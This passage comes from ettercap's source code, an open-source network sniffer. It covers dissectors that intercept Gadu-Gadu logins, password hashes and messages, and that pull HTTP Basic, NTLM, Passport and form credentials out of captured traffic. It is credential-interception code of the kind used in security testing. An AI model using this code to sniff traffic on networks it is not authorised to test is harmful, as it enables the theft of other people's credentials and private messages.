10.10.10.11:1696 - WELCOME SEED: 0xAD130562 (2903704930) GG7 : 10.10.10.11:1696 -> 217.17.45.143:443 - LOGIN UIN: 5114529 PWD_HASH: 0x21D13E38992A341DD33BB52DDFA2382A173A5361 STATUS: (invisible + private) VERSION: 7.7 LIP: 10.10.10.11:1550 RIP: 0.0.0.0:0 GG : 10.10.10.11:1706 -> 217.17.45.143:443 - SEND_MSG RECIPIENT: 7244283 MESSAGE: "wiadomosc testowa" GG : 217.17.45.143:443 -> 10.10.10.11:1706 - RECV_MSG SENDER: 7244283 MESSAGE: "dzieki za wiadomosc" GG7 : 217.17.45.143:443 -> 10.10.10.11:1706 - STATUS CHANGED UIN: 7244283 STATUS: a swistak siedzi i zawija (busy + descr) VERSION: 7.6 RIP: 207.46.19.190:1550 GG : 217.17.41.85:8074 -> 10.10.10.11:1685 - WELCOME SEED: 0x1D66B45F (493270111) GG4/5 : 10.10.10.11:1685 -> 217.17.41.85:8074 - LOGIN UIN: 5114529 PWD_HASH: 0x1B85493D (461719869) STATUS: zaraz weekend (invisible + descr + private) VERSION: 4.8 + has audio LIP: 10.10.10.11:1550 GG : 217.17.41.85:8074 -> 10.10.10.11:1685 - STATUS CHANGED UIN: 2688291 STATUS: i co ja bede robil przez te 4 dni ... (not available + descr) GG : 10.10.10.11:1685 -> 217.17.41.85:8074 - NEW STATUS STATUS: goraaaaaaaaaaaaaco!!!!!!!!! (busy + descr + private) */ /* CHANGELOG: v0.2: - added interception of sent/received messages - added interception of status descriptions - added notification about status changes - added interception of gg server/client ip addresses - added interception of gg user's local/remote ip addresses - added determination of Gadu-Gadu version - tiny bugfixes v0.1 (initial release): - added support for following gadu-gadu protocols: 4.x, 5.x, 6.x, 7.x - added interception of gg numbers, password hashes and seeds - added interception of gg connections to port 8074 and 443 */ /* TODO: - wpkontakt support (sessions management needed) - std_gg/kadu/ekg/wpkontakt fingerprinting (additional research needed) - sms sniffing? (already implemented through http dissector) - nat detection */ /* CONFIGURATION */ /* uncomment #define below if you want to see all contacts status changes - be careful using this option in really big networks - it could mess up your whole screen ! */ /* #define GG_CONTACTS_STATUS_CHANGES 1 */ #include #include #include /* globals */ #define GG_LOGIN50_CMD 0x0000000c #define GG_LOGIN60_CMD 0x00000015 #define GG_LOGIN70_CMD 0x00000019 #define GG_WELCOME_CMD 0x00000001 #define GG_SEND_MSG_CMD 0x0000000b #define GG_RECV_MSG_CMD 0x0000000a #define GG_NEW_STATUS_CMD 0x00000002 #define GG_STATUS_CMD 0x00000002 #define GG_STATUS50_CMD 0x0000000c #define GG_STATUS60_CMD 0x0000000f #define GG_STATUS70_CMD 0x00000017 struct gg_hdr { u_int32 type; u_int32 len; }; struct gg_welcome_hdr { u_int32 seed; }; struct gg_login50_hdr { u_int32 uin; u_int32 hash; u_int32 status; u_int32 version; u_int8 local_ip[4]; u_int16 local_port; char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed)); struct gg_login60_hdr { u_int32 uin; u_int32 hash; u_int32 status; u_int32 version; u_int8 unknown1; /* 0x00 */ u_int8 local_ip[4]; u_int16 local_port; u_int8 remote_ip[4]; u_int16 remote_port; u_int8 image_size; u_int8 unknown2; /* 0xbe */ char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed)); struct gg_login70_hdr { u_int32 uin; u_int8 unknown1; /* 0x02 */ u_int32 hash[5]; /* 160b */ u_int32 unknown2[11]; /* 0x00, 352b */ u_int32 status; u_int16 version; u_int16 unknown3; /* 0xc202 */ u_int8 unknown4; /* 0x00 */ u_int8 local_ip[4]; u_int16 local_port; u_int8 remote_ip[4]; u_int16 remote_port; u_int8 image_size; u_int8 unknown5; /* 0xbe */ char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed)); struct gg_send_msg_hdr { u_int32 recipient; u_int32 seq; u_int32 class; char message[2000]; }__attribute__ ((packed)); struct gg_recv_msg_hdr { u_int32 sender; u_int32 seq; u_int32 time; u_int32 class; char message[2000]; }__attribute__ ((packed)); struct gg_new_status_hdr { u_int32 status; char description[71]; /* 70+1 (0x0) */ u_int32 time; }; struct gg_status_hdr { u_int32 uin; u_int32 status; char description[71]; /* 70+1 (0x0) */ u_int32 time; }; struct gg_status50_hdr { u_int32 uin; u_int32 status; u_int8 remote_ip[4]; u_int16 remote_port; u_int32 version; u_int16 unknown1; /* remote port again? */ char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed)); struct gg_status60_hdr { u_int32 uin; u_int8 status; u_int8 remote_ip[4]; u_int16 remote_port; u_int8 version; u_int8 image_size; u_int8 unknown1; /* 0x00 */ char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed));; struct gg_status70_hdr { u_int32 uin; u_int8 status; u_int8 remote_ip[4]; u_int16 remote_port; u_int8 version; u_int8 image_size; u_int8 unknown1; /* 0x00 */ u_int32 unknown2; /* 0x00 */ char description[71]; /* 70+1 (0x0) */ u_int32 time; }__attribute__ ((packed));; /* protos */ FUNC_DECODER(dissector_gg); void gg_init(void); void gg_get_status(u_int32 status, char *str); void gg_get_version(u_int32 version, char *str); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init gg_init(void) { dissect_add("gg", APP_LAYER_TCP, 8074, dissector_gg); /* dissect_add("gg", APP_LAYER_TCP, 443, dissector_gg); */ } FUNC_DECODER(dissector_gg) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct gg_hdr *gg; struct gg_welcome_hdr *gg_welcome; struct gg_login50_hdr *gg_login50; struct gg_login60_hdr *gg_login60; struct gg_login70_hdr *gg_login70; struct gg_send_msg_hdr *gg_send_msg; struct gg_recv_msg_hdr *gg_recv_msg; struct gg_new_status_hdr *gg_new_status; char *tbuf, *tbuf2, *tbuf3; char user[10], pass[40]; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* cast the gg header */ gg = (struct gg_hdr *)ptr; gg_login50 = (struct gg_login50_hdr *)(gg + 1); gg_login60 = (struct gg_login60_hdr *)(gg + 1); gg_login70 = (struct gg_login70_hdr *)(gg + 1); gg_welcome = (struct gg_welcome_hdr *)(gg + 1); gg_send_msg = (struct gg_send_msg_hdr *)(gg + 1); gg_recv_msg = (struct gg_recv_msg_hdr *)(gg + 1); gg_new_status = (struct gg_new_status_hdr *)(gg + 1); /* what type of packets do we process ? */ if (gg->type != GG_LOGIN50_CMD && gg->type != GG_LOGIN60_CMD && gg->type != GG_LOGIN70_CMD && gg->type != GG_WELCOME_CMD && gg->type != GG_SEND_MSG_CMD && gg->type != GG_RECV_MSG_CMD && gg->type != GG_NEW_STATUS_CMD && gg->type != GG_STATUS_CMD && gg->type != GG_STATUS50_CMD && gg->type != GG_STATUS60_CMD && gg->type != GG_STATUS70_CMD) return NULL; /* skip incorrect Gadu-Gadu packets */ if ((gg->len) != ((PACKET->DATA.len)-8)) return NULL; DEBUG_MSG("Gadu-Gadu --> TCP dissector_gg (%.8X:%.8X)", gg->type, gg->len); SAFE_CALLOC(tbuf, 50, sizeof(char)); SAFE_CALLOC(tbuf2, 71, sizeof(char)); SAFE_CALLOC(tbuf3, 30, sizeof(char)); if ((gg->type == GG_LOGIN50_CMD) && !FROM_SERVER("gg", PACKET)) { gg_get_status(gg_login50->status,tbuf); gg_get_version(gg_login50->version,tbuf3); if ((int)gg->len-22 < 0) return NULL; strncpy(tbuf2,gg_login50->description, (gg->len)-22); tbuf2[(gg->len)-22]='\0'; sprintf(user,"%u",gg_login50->uin); PACKET->DISSECTOR.user = strdup(user); sprintf(pass,"%u",gg_login50->hash); PACKET->DISSECTOR.pass = strdup(pass); DISSECT_MSG("GG4/5 : %s:%d -> %s:%d - LOGIN UIN: %u PWD_HASH: 0x%.8X (%u) STATUS: %s (%s) VERSION: %s LIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_login50->uin, gg_login50->hash, gg_login50->hash, tbuf2, tbuf, tbuf3, gg_login50->local_ip[0], gg_login50->local_ip[1], gg_login50->local_ip[2], gg_login50->local_ip[3], gg_login50->local_port); } else if (gg->type == GG_LOGIN60_CMD) { gg_get_status(gg_login60->status,tbuf); gg_get_version(gg_login60->version,tbuf3); if ((int)gg->len-31 < 0) return NULL; strncpy(tbuf2,gg_login60->description, (gg->len)-31); tbuf2[(gg->len)-31]='\0'; sprintf(user,"%u",gg_login60->uin); PACKET->DISSECTOR.user = strdup(user); sprintf(pass,"%u",gg_login60->hash); PACKET->DISSECTOR.pass = strdup(pass); DISSECT_MSG("GG6 : %s:%d -> %s:%d - LOGIN UIN: %u PWD_HASH: 0x%.8X (%u) STATUS: %s (%s) VERSION: %s LIP: %u.%u.%u.%u:%u RIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_login60->uin, gg_login60->hash, gg_login60->hash, tbuf2, tbuf, tbuf3, gg_login60->local_ip[0], gg_login60->local_ip[1], gg_login60->local_ip[2], gg_login60->local_ip[3], gg_login60->local_port, gg_login60->remote_ip[0], gg_login60->remote_ip[1], gg_login60->remote_ip[2], gg_login60->remote_ip[3], gg_login60->remote_port); } else if (gg->type == GG_LOGIN70_CMD) { gg_get_status(gg_login70->status,tbuf); gg_get_version(gg_login70->version,tbuf3); if ((int)gg->len-92 < 0) return NULL; strncpy(tbuf2,gg_login70->description, (gg->len)-92); tbuf2[(gg->len)-92]='\0'; sprintf(user,"%u",gg_login70->uin); PACKET->DISSECTOR.user = strdup(user); sprintf(pass,"%X%X%X%X%X",gg_login70->hash[0],gg_login70->hash[1],gg_login70->hash[2],gg_login70->hash[3],gg_login70->hash[4]); PACKET->DISSECTOR.pass = strdup(pass); DISSECT_MSG("GG7 : %s:%d -> %s:%d - LOGIN UIN: %u PWD_HASH: 0x%.8X%.8X%.8X%.8X%.8X STATUS: %s (%s) VERSION: %s LIP: %u.%u.%u.%u:%u RIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_login70->uin, gg_login70->hash[4],gg_login70->hash[3],gg_login70->hash[2],gg_login70->hash[1],gg_login70->hash[0], tbuf2, tbuf, tbuf3, gg_login70->local_ip[0], gg_login70->local_ip[1], gg_login70->local_ip[2], gg_login70->local_ip[3], gg_login70->local_port, gg_login70->remote_ip[0], gg_login70->remote_ip[1], gg_login70->remote_ip[2], gg_login70->remote_ip[3], gg_login70->remote_port); } else if (gg->type == GG_SEND_MSG_CMD) { if (!FROM_SERVER("gg", PACKET)) { DISSECT_MSG("GG : %s:%d -> %s:%d - SEND_MSG RECIPIENT: %u MESSAGE: \"%s\"\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_send_msg->recipient, gg_send_msg->message); } } else if (gg->type == GG_RECV_MSG_CMD) { DISSECT_MSG("GG : %s:%d -> %s:%d - RECV_MSG SENDER: %u MESSAGE: \"%s\"\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_recv_msg->sender, gg_recv_msg->message); } else if (gg->type == GG_WELCOME_CMD) { DISSECT_MSG("GG : %s:%d -> %s:%d - WELCOME SEED: 0x%.8X (%u)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_welcome->seed, gg_welcome->seed); } #ifdef GG_CONTACTS_STATUS_CHANGES else if ((gg->type == GG_STATUS_CMD) && FROM_SERVER("gg", PACKET)) { gg_get_status(gg_status->status,tbuf); if ((int)gg->len-8 < 0) return NULL; strncpy(tbuf2,gg_status->description, (gg->len)-8); tbuf2[(gg->len)-8]='\0'; DISSECT_MSG("GG : %s:%d -> %s:%d - STATUS CHANGED UIN: %u STATUS: %s (%s)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_status->uin, tbuf2, tbuf); } #endif else if ((gg->type == GG_NEW_STATUS_CMD) && !FROM_SERVER("gg", PACKET)) { gg_get_status(gg_new_status->status,tbuf); if ((int)gg->len-4 < 0) return NULL; strncpy(tbuf2,gg_new_status->description, (gg->len)-4); tbuf2[(gg->len)-4]='\0'; DISSECT_MSG("GG : %s:%d -> %s:%d - NEW STATUS STATUS: %s (%s)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), tbuf2, tbuf); } #ifdef GG_CONTACTS_STATUS_CHANGES else if ((gg->type == GG_STATUS50_CMD) && FROM_SERVER("gg", PACKET)) { gg_get_status(gg_status50->status,tbuf); gg_get_version(gg_status50->version,tbuf3); if ((int)gg->len-20 < 0) return NULL; strncpy(tbuf2,gg_status50->description, (gg->len)-20); tbuf2[(gg->len)-20]='\0'; DISSECT_MSG("GG4/5 : %s:%d -> %s:%d - STATUS CHANGED UIN: %u STATUS: %s (%s) VERSION: %s RIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg_status50->uin, tbuf2, tbuf, tbuf3, gg_status50->remote_ip[0], gg_status50->remote_ip[1], gg_status50->remote_ip[2], gg_status50->remote_ip[3], gg_status50->remote_port); } else if (gg->type == GG_STATUS60_CMD) { gg_get_status(gg_status60->status,tbuf); gg_get_version(gg_status60->version,tbuf3); if ((int)gg->len-14 < 0) return NULL; strncpy(tbuf2,gg_status60->description, (gg->len)-14); tbuf2[(gg->len)-14]='\0'; DISSECT_MSG("GG6 : %s:%d -> %s:%d - STATUS CHANGED UIN: %u STATUS: %s (%s) VERSION: %s RIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), (gg_status60->uin & 0x00ffffff), tbuf2, tbuf, tbuf3, gg_status60->remote_ip[0], gg_status60->remote_ip[1], gg_status60->remote_ip[2], gg_status60->remote_ip[3], gg_status60->remote_port); } else if (gg->type == GG_STATUS70_CMD) { gg_get_status(gg_status70->status,tbuf); if ((int)gg->len-18 < 0) return NULL; gg_get_version(gg_status70->version,tbuf3); strncpy(tbuf2,gg_status70->description, (gg->len)-18); tbuf2[(gg->len)-18]='\0'; DISSECT_MSG("GG7 : %s:%d -> %s:%d - STATUS CHANGED UIN: %u STATUS: %s (%s) VERSION: %s RIP: %u.%u.%u.%u:%u\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), (gg_status70->uin & 0x00ffffff), tbuf2, tbuf, tbuf3, gg_status70->remote_ip[0], gg_status70->remote_ip[1], gg_status70->remote_ip[2], gg_status70->remote_ip[3], gg_status70->remote_port); } #endif /* else { DISSECT_MSG("GG : %s:%d -> %s:%d - CMD TYPE: %.8X (%d) LEN: %.8X (%d) DLEN: %d\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp2), ntohs(PACKET->L4.dst), gg->type, gg->type, gg->len, gg->len, PACKET->DATA.len); } */ SAFE_FREE(tbuf); SAFE_FREE(tbuf2); SAFE_FREE(tbuf3); return NULL; } void gg_get_status(u_int32 status, char *str) { switch ((status&0x00ff)) { case 0x0014: strcpy(str,"invisible"); break; case 0x0002: strcpy(str,"available"); break; case 0x0003: strcpy(str,"busy"); break; case 0x0006: strcpy(str,"blocked"); break; case 0x0001: strcpy(str,"not available"); break; case 0x0016: strcpy(str,"invisible + descr"); break; case 0x0004: strcpy(str,"available + descr"); break; case 0x0005: strcpy(str,"busy + descr"); break; case 0x0015: strcpy(str,"not available + descr"); break; default: strcpy(str,"unknown"); } if ((status&0xff00)==0x8000) strcat(str," + private"); } void gg_get_version(u_int32 version, char *str) { switch ((version&0x00ff)) { case 0x0000002A: strcpy(str,"7.7"); break; case 0x00000029: strcpy(str,"7.6"); break; case 0x00000024: strcpy(str,"6.1/7.6"); break; case 0x00000028: strcpy(str,"7.5"); break; case 0x00000027: case 0x00000026: case 0x00000025: strcpy(str,"7.0"); break; case 0x00000022: case 0x00000021: case 0x00000020: strcpy(str,"6.0"); break; case 0x0000001E: case 0x0000001C: strcpy(str,"5.7"); break; case 0x0000001B: case 0x00000019: strcpy(str,"5.0"); break; case 0x00000018: strcpy(str,"5.0/4.9"); break; case 0x00000017: case 0x00000016: strcpy(str,"4.9"); break; case 0x00000015: case 0x00000014: strcpy(str,"4.8"); break; case 0x00000011: strcpy(str,"4.6"); break; case 0x00000010: case 0x0000000f: strcpy(str,"4.5"); break; case 0x0000000b: strcpy(str,"4.0"); break; default: sprintf(str,"unknown (0x%X)",version); } if ((version&0xf0000000)==0x40000000) strcat(str," + has audio"); if ((version&0x0f000000)== 0x04000000) strcat(str," + eraomnix"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_http.c000664 000000 000000 00000064572 13711276346 020243 0ustar00rootroot000000 000000 /* ettercap -- dissector http and proxy -- TCP 80, 8080 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* globals */ #define USER 0 #define PASS 1 struct http_status { u_char c_status; #define POST_WAIT_DELIMITER 1 #define POST_LAST_CHANCE 2 #define NTLM_WAIT_RESPONSE 3 #define PROXY_WAIT_OK 4 #define PROXY_WAIT_DELIMITER 5 u_char c_data[150]; /* XXX - Manage this array dinamically (with session_destroyer) */ }; typedef struct { u_int16 len; u_int16 maxlen; u_int32 offset; }tSmbStrHeader; typedef struct { char ident[8]; u_int32 msgType; }tSmbStdHeader; typedef struct { char ident[8]; u_int32 msgType; tSmbStrHeader uDomain; u_int32 flags; u_int8 challengeData[8]; u_int8 reserved[8]; tSmbStrHeader emptyString; u_int8 buffer[1024]; u_int32 bufIndex; }tSmbNtlmAuthChallenge; typedef struct { char ident[8]; u_int32 msgType; tSmbStrHeader lmResponse; tSmbStrHeader ntResponse; tSmbStrHeader uDomain; tSmbStrHeader uUser; tSmbStrHeader uWks; tSmbStrHeader sessionKey; u_int32 flags; u_int8 buffer[1024]; u_int32 bufIndex; }tSmbNtlmAuthResponse; struct http_field_entry { char *name; SLIST_ENTRY(http_field_entry) next; }; static SLIST_HEAD(, http_field_entry) http_fields[2]; /* protos */ FUNC_DECODER(dissector_http); void http_init(void); static void Parse_Method_Get(char *ptr, struct packet_object *po); static void Parse_Method_Post(char *ptr, struct packet_object *po); static void Decode_Url(char *src); static int Check_CONNECT(char *ptr, struct packet_object *po); static void Find_Url(char *to_parse, char **ret); static void Find_Url_Referer(char *to_parse, char **ret); static void Parse_Post_Payload(char *ptr, struct http_status *conn_status, struct packet_object *po); static void Print_Pass(struct packet_object *po); static void Get_Banner(char *ptr, struct packet_object *po); static u_char Parse_Form(char *to_parse, char **ret, int mode); static int Parse_Passport_Auth(char *from_here, struct packet_object *po); static int Parse_NTLM_Auth(char *ptr, char *from_here, struct packet_object *po); static int Parse_Basic_Auth(char *ptr, char *from_here, struct packet_object *po); static int Parse_User_Agent(char *end, char *from_here, struct packet_object *po); static char *unicodeToString(char *p, size_t len); static void dumpRaw(char *str, unsigned char *buf, size_t len); int http_fields_init(void); #define CVAL(buf,pos) (((unsigned char *)(buf))[pos]) #define PVAL(buf,pos) ((unsigned)CVAL(buf,pos)) #define SVAL(buf,pos) (PVAL(buf,pos)|PVAL(buf,(pos)+1)<<8) #define IVAL(buf,pos) (SVAL(buf,pos)|SVAL(buf,(pos)+2)<<16) #define GetUnicodeString(structPtr, header) unicodeToString(((char*)structPtr) + IVAL(&structPtr->header.offset,0) , SVAL(&structPtr->header.len,0)/2) /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init http_init(void) { sslw_dissect_add("https", 443, dissector_http, SSL_ENABLED); sslw_dissect_add("proxy", 8080, dissector_http, SSL_DISABLED); dissect_add("http", APP_LAYER_TCP, 80, dissector_http); } FUNC_DECODER(dissector_http) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; struct http_status *conn_status; char *from_here; /* unused variable */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* XXX - This way we won't catch ProxyAuth on CONNECT */ if (Check_CONNECT((char*)ptr, PACKET)) return NULL; /* HOOK POINT: HOOK_PROTO_HTTP */ hook_point(HOOK_PROTO_HTTP, PACKET); /* Parse client requests. * Check the request type first. */ if (FROM_CLIENT("http", PACKET) || FROM_CLIENT("proxy", PACKET) || FROM_CLIENT("https", PACKET)) { /* Check Proxy or WWW auth first * then password in the GET or POST. */ if ((from_here = strstr((const char*)ptr, "Authorization: Passport")) && Parse_Passport_Auth(from_here + strlen("Authorization: Passport"), PACKET)); else if ((from_here = strstr((const char*)ptr, ": NTLM ")) && Parse_NTLM_Auth((char*)ptr, from_here + strlen(": NTLM "), PACKET)); else if ((from_here = strstr((const char*)ptr, ": Basic ")) && Parse_Basic_Auth((char*)ptr, from_here + strlen(": Basic "), PACKET)); else if ((from_here = strstr((const char*)ptr, "User-Agent: ")) && Parse_User_Agent(end, from_here + strlen("User-Agent: "), PACKET)); else if (!strncmp((const char*)ptr, "GET ", 4)) Parse_Method_Get((char*)ptr + strlen("GET "), PACKET); else if (!strncmp((const char*)ptr, "POST ", 5)) Parse_Method_Post((char*)ptr + strlen("POST "), PACKET); else { dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_http)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct http_status *) s->data; /* Are we waiting for post termination? */ if (conn_status->c_status == POST_WAIT_DELIMITER || conn_status->c_status == POST_LAST_CHANCE) Parse_Post_Payload((char*)ptr, conn_status, PACKET); } SAFE_FREE(ident); } } else { /* Server Replies */ if (!strncmp((const char*)ptr, "HTTP", 4)) { Get_Banner((char*)ptr, PACKET); /* Since the server replies there's no need to * wait for POST termination or client response */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_http)); /* Check Proxy or WWW Auth (server challenge) */ /* XXX - Is the NTLM challenge always in the same * packet as HTTP header? Otherwise put these lines * out from the if (decrease performances, checks all pcks) */ if ((from_here = strstr((const char*)ptr, ": NTLM "))) Parse_NTLM_Auth((char*)ptr, from_here + strlen(": NTLM "), PACKET); } } return NULL; } /* Set the SSL flag (for ssl wrapper) when the CONNECT is finished */ static int Check_CONNECT(char *ptr, struct packet_object *po) { void *ident = NULL; struct ec_session *s = NULL; struct http_status *conn_status = NULL; /* If we don't activate SSL wrappers we don't need to trace CONNECT */ if (!EC_GBL_CONF->aggressive_dissectors || EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read) return 0; dissect_create_ident(&ident, po, DISSECT_CODE(dissector_http)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct http_status *) s->data; if (FROM_SERVER("proxy", po)) { if (conn_status->c_status == PROXY_WAIT_OK && !strncmp(ptr + 8, " 200 ", 5)) conn_status->c_status = PROXY_WAIT_DELIMITER; if (conn_status->c_status == PROXY_WAIT_DELIMITER && (strstr(ptr, "\r\n\r\n") || (ptr[0]=='\r' && ptr[1]=='\n'))) { dissect_wipe_session(po, DISSECT_CODE(dissector_http)); po->flags |= PO_SSLSTART; SAFE_FREE(ident); return 1; } } } else if (FROM_CLIENT("proxy", po) && !strncmp(ptr, "CONNECT ", 8)) { dissect_create_session(&s, po, DISSECT_CODE(dissector_http)); SAFE_CALLOC(s->data, 1, sizeof(struct http_status)); conn_status = (struct http_status *) s->data; conn_status->c_status = PROXY_WAIT_OK; session_put(s); } SAFE_FREE(ident); if (conn_status && (conn_status->c_status == PROXY_WAIT_DELIMITER || conn_status->c_status == PROXY_WAIT_OK)) return 1; return 0; } /* Get the server banner from the headers */ static void Get_Banner(char *ptr, struct packet_object *po) { char *start, *end; u_int32 len; /* This is the banner of the remote * server and not of the proxy */ DEBUG_MSG("http - GET BANNER"); if (FROM_SERVER("proxy", po)) po->DISSECTOR.banner=strdup("Proxy"); else { /* Get the server version */ if ((start = strstr(ptr, "Server: ")) && (end = strstr(start, "\r"))) { start += strlen("Server: "); len = end - start; if (len>0 && len<1024) { SAFE_CALLOC(po->DISSECTOR.banner, len+1, sizeof(char)); memcpy(po->DISSECTOR.banner, start, len); } } } } /* Parse Passport Authentication */ static int Parse_Passport_Auth(char *from_here, struct packet_object *po) { char *token, *to_decode, *tok; DEBUG_MSG("HTTP --> dissector http (Passport Auth)"); if (!(to_decode = strdup(from_here))) return 1; if ( (token = strstr(to_decode, "OrgURL=")) == NULL ) { SAFE_FREE(to_decode); return 1; } /* Catch the original URL */ ec_strtok(token, ",", &tok); po->DISSECTOR.info = strdup(token + strlen("OrgURL=")); Decode_Url(po->DISSECTOR.info); /* Catch user and password */ while ( (token = ec_strtok(NULL, ",", &tok)) != NULL ) { if (!strncmp(token, "sign-in=", strlen("sign-in="))) { po->DISSECTOR.user = strdup(token + strlen("sign-in=")); Decode_Url(po->DISSECTOR.user); } else if (!strncmp(token, "pwd=", strlen("pwd="))) { po->DISSECTOR.pass = strdup(token + strlen("pwd=")); Decode_Url(po->DISSECTOR.pass); /* password is the last interesting field */ break; } } Print_Pass(po); SAFE_FREE(to_decode); return 1; } /* Parse Basic Authentication for both Proxy and WWW Auth */ static int Parse_Basic_Auth(char *ptr, char *from_here, struct packet_object *po) { int Proxy_Auth = 0; char *to_decode, *tok; char *user, *pass; DEBUG_MSG("HTTP --> dissector http (Basic Auth)"); /* If it's a proxy auth and we are not interested on proxy stuff * return 0, so the dissector will continue to parse GET and POST */ /* It stands for both Proxy-Authenticate and Authorization ;) */ if (strstr(ptr, "Proxy-Auth") || strstr(ptr, "Proxy-auth")) { if (FROM_CLIENT("proxy", po)) Proxy_Auth = 1; else return 0; } if (!(to_decode = strdup(from_here))) return 1; ec_strtok(to_decode, "\r", &tok); char *decoded; base64decode(to_decode, &decoded); DEBUG_MSG("Clear text AUTH: %s", decoded); /* clear text should be username:password * this means that we must find the first instance of : * token shoul dbe username, and decoded should just be the password */ /* Parse the cleartext auth string */ pass = NULL; user = ec_strtok(decoded, ":", &pass); if (pass != NULL && user != NULL) { po->DISSECTOR.user = strdup(user); po->DISSECTOR.pass = strdup(pass); /* Are we authenticating to the proxy or to a website? */ if (Proxy_Auth) po->DISSECTOR.info = strdup("Proxy Authentication"); else Find_Url(ptr, &(po->DISSECTOR.info)); Print_Pass(po); } SAFE_FREE(decoded); SAFE_FREE(to_decode); return 1; } static int Parse_User_Agent(char* end, char *from_here, struct packet_object *po) { // find the end of the line const char* line_end = (const char*)memchr(from_here, '\n', end - from_here); if (line_end == NULL) { return 0; } unsigned int line_length = line_end - from_here; const char* comment_begin = (const char*)memchr(from_here, '(', line_length); if (comment_begin == NULL || ((comment_begin + 1) >= end)) { // no comments found return 0; } ++comment_begin; const char* comment_end = (const char*)memchr(comment_begin, ')', line_end - comment_begin); if (comment_end == NULL) { // couldn't find the close on the comment return 0; } const char* os = NULL; while (os == NULL && comment_begin != NULL) { unsigned int comment_length = comment_end - comment_begin; if ((comment_length > 10 && strncmp(comment_begin, "Windows NT", 10) == 0) || (comment_length > 9 && strncmp(comment_begin, "Intel Mac", 9) == 0) || (comment_length > 7 && strncmp(comment_begin, "PPC Mac", 7) == 0) || (comment_length > 10 && strncmp(comment_begin, "CPU iPhone", 10) == 0) || (comment_length > 8 && strncmp(comment_begin, "Android", 7) == 0) || (comment_length > 5 && strncmp(comment_begin, "CrOS", 4) == 0) || // Chrome OS (comment_length > 5 && strncmp(comment_begin, "Linux", 5) == 0)) { os = comment_begin; } if (os == NULL) { comment_begin = memchr(comment_begin, ';', comment_end - comment_begin); if (comment_begin != NULL && ((comment_begin + 2) < comment_end)) { // skip the ; and the ' ' comment_begin += 2; } else { comment_begin = NULL; } } else { const char* the_end = memchr(comment_begin, ';', comment_end - comment_begin); if (the_end != NULL) { comment_end = the_end; } SAFE_CALLOC(po->DISSECTOR.os, 1, (comment_end - os) + 1); memcpy(po->DISSECTOR.os, os, comment_end - os); po->DISSECTOR.os[comment_end - os] = 0; } } // always return 0 so the main loop drops down to get/post return 0; } /* Parse NTLM challenge and response for 